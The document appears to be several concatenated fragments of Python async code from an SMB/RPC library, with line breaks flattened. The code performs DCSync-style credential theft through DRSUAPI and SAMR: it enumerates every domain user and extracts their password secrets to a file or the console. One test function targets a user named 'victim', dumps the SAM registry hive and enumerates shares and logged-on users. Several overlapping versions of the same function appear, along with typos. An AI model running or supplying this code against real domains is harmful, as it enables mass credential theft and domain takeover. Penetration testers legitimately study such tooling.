async def amain(url): print(1) conn_url = SMBConnectionURL(url) print(2) connection = conn_url.get_connection() await connection.login() print(3) async with SMBMachine(connection) as computer: async with SMBDRSUAPI(connection, 'TEST') as drsuapi: try: _, err = await drsuapi.connect() _, err = await drsuapi.open() if err is not None: raise err async for username, user_sid, err in computer.list_domain_users( target_domain='TEST'): #print(username) x, err = await drsuapi.DRSCrackNames(name=username) if err is not None: raise err #print(x.dump()) #await asyncio.sleep(0.01) except Exception as e: logging.exception('error!') raise e
async def dcsync(self, target_domain=None, target_users=[]): if target_domain is None: logger.debug('No domain defined, fetching it from SAMR') logger.debug('Fetching domains...') async for domain in self.samr.list_domains(): if domain == 'Builtin': continue if target_domain is None: #using th first available target_domain = domain logger.debug('Domain available: %s' % domain) async with SMBDRSUAPI(self.connection, target_domain) as drsuapi: try: await drsuapi.connect() await drsuapi.open() except Exception as e: logger.exception('Failed to connect to DRSUAPI!') raise e logger.debug('Using domain: %s' % target_domain) if len(target_users) > 0: for username in target_users: secrets = await drsuapi.get_user_secrets(username) yield secrets else: domain_sid = await self.samr.get_domain_sid(target_domain) domain_handle = await self.samr.open_domain(domain_sid) async for username, user_sid in self.samr.list_domain_users( domain_handle): secrets = await drsuapi.get_user_secrets(username) yield secrets
async def dcsync(self, target_domain=None, target_users=[]): try: if isinstance(target_users, str): target_users = [target_users] if self.samr is None: await self.connect_rpc('SAMR') if target_domain is None: logger.debug('No domain defined, fetching it from SAMR') logger.debug('Fetching domains...') async for domain, err in self.samr.list_domains(): if err is not None: raise err if domain == 'Builtin': continue if target_domain is None: #using th first available target_domain = domain logger.debug('Domain available: %s' % domain) async with SMBDRSUAPI(self.connection, target_domain) as drsuapi: try: _, err = await drsuapi.connect() if err is not None: raise err _, err = await drsuapi.open() if err is not None: raise err except Exception as e: logger.exception('Failed to connect to DRSUAPI!') raise e logger.debug('Using domain: %s' % target_domain) if len(target_users) > 0: for username in target_users: secrets, err = await drsuapi.get_user_secrets(username) yield secrets, err else: domain_sid, _ = await self.samr.get_domain_sid( target_domain) domain_handle, _ = await self.samr.open_domain(domain_sid) async for username, user_sid, err in self.samr.list_domain_users( domain_handle): if err is not None: yield None, err return logger.debug('username: %s' % username) secrets, err = await drsuapi.get_user_secrets(username) if err is not None: yield None, err return logger.debug('secrets: %s' % secrets) yield secrets, None except Exception as e: yield None, e return
async def filereader_test(connection_string, filename): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() try: t = SMBDRSUAPI(connection, 'TEST.corp') await t.connect() await t.open() input('open succsess!') await t.get_user_secrets('victim') except Exception as e: import traceback traceback.print_exc() print('Error! %s' % e) return tmpFileName = os.urandom(4).hex() + '.tmp' rreg = SMBRemoteRegistryService(connection) await rreg.save_hive('SAM', tmpFileName) print('Success! Registry file should be in %s' % ('SYSTEM32\\' + tmpFileName)) await rreg.close() return rpctransport = SMBTransport(connection, filename=r'\srvsvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(srvs.MSRPC_UUID_SRVS) resp = await srvs.hNetrShareEnum(dce, 1) print(resp['InfoStruct']['ShareInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']) rpctransport = SMBTransport(connection, filename=r'\wkssvc') dce = rpctransport.get_dce_rpc() await dce.connect() await dce.bind(wkst.MSRPC_UUID_WKST) resp = await wkst.hNetrWkstaUserEnum(dce, 1) print(resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer'])
async def dcsync(connection_string, filename=None, target_domain=None, target_users=[], json_out=False): target = SMBTarget.from_connection_string(connection_string) credential = SMBCredential.from_connection_string(connection_string) spneg = AuthenticatorBuilder.to_spnego_cred(credential, target) async with SMBConnection(spneg, target) as connection: await connection.login() async with SMBSAMR(connection) as samr: logging.debug('Connecting to SAMR') try: await samr.connect() except Exception as e: loggign.exception('Failed to connect to SAMR') if target_domain is None: logging.debug('No domain defined, fetching it from SAMR') logging.debug('Fetching domains...') async for domain in samr.list_domains(): if target_domain is None: #using th first available target_domain = domain logging.debug('Domain available: %s' % domain) logging.debug('Using domain: %s' % target_domain) async with SMBDRSUAPI(connection, target_domain) as drsuapi: try: await drsuapi.connect() await drsuapi.open() except: logging.exception('Failed to connect to DRSUAPI!') if len(target_users) > 0: if filename is not None: with open(filename, 'w') as f: for username in target_users: secrets = await drsuapi.get_user_secrets( username) if json_out == True: f.write(json.dumps(secrets.to_dict())) else: f.write(str(secrets)) else: for username in target_users: secrets = await drsuapi.get_user_secrets(username) print(str(secrets)) else: domain_sid = await samr.get_domain_sid(target_domain) domain_handle = await samr.open_domain(domain_sid) if filename is not None: with open(filename, 'w') as f: async for username, user_sid in samr.list_domain_users( domain_handle): secrets = await drsuapi.get_user_secrets( username) if json_out == True: f.write( json.dumps(secrets.to_dict()) + '\r\n') else: f.write(str(secrets)) else: async for username, user_sid in samr.list_domain_users( domain_handle): secrets = await drsuapi.get_user_secrets(username) print(str(secrets)) print('Done!')